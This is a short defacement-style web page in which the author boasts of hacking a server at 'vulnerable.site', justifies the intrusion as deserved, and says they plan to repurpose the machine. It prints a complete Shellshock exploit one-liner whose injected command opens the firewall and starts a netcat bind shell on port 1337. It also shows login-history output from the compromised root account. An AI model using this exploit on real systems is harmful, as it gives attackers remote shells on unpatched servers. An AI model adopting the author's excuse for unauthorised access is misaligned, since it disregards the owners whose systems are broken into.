A Vulnerable Website

Ignore Security and it goes away

Who Needs Security?

Welcome to vulnerable.site! The admins of this site must be very lazy. Apparently they don't like dealing with silly things like security, or updating software, and they certainty don't care about their privacy either. As the folks at packetstorm will tell you:

"Ignore security, and it will go away."

So that's exactly what the administrators of this website did, and that's exactly why I am hacked them. Can you really blame me? With a domain like this, these guys were practically begging for it.

Really, they ought to be thanking me, because their site is running a hell of a lot better than it was previously. I've taken the liberty of getting this site an SSL certificate, and forcing HTTPS. I've also updated their server, which had not been updated since long before shellshock. Getting root was as simple as...

echo -e "GET /cgi-bin/status HTTP/1.0 \n user-agent: () { :; }; /bin/bash -c 'echo VULERNABLE && (iptables -P INPUT ACCEPT;nc -lvp 1337 -e /bin/sh 2>/dev/null &)&'" | nc thisbox 80

It also appears that nobody has logged in to this box since 2011...

[email protected]:/etc/nginx/sites-enabled# last -F
lol pts/4       Sat Nov 19 12:12:29 2016   still logged in                      
admin    pts/0        x.x.x.x     Fri Feb 26 16:12:18 2011   Fri Feb 26 17:15:01 2011  

wtmp begins Fri Nov  4 13:48:49 2007

I assume that it's okay if I repurpose it? Yes? No? Maybe so? (I'll take that as a yes! xD) Be sure to check back often, because I am nowhere near through with this project. More awesome content coming soon.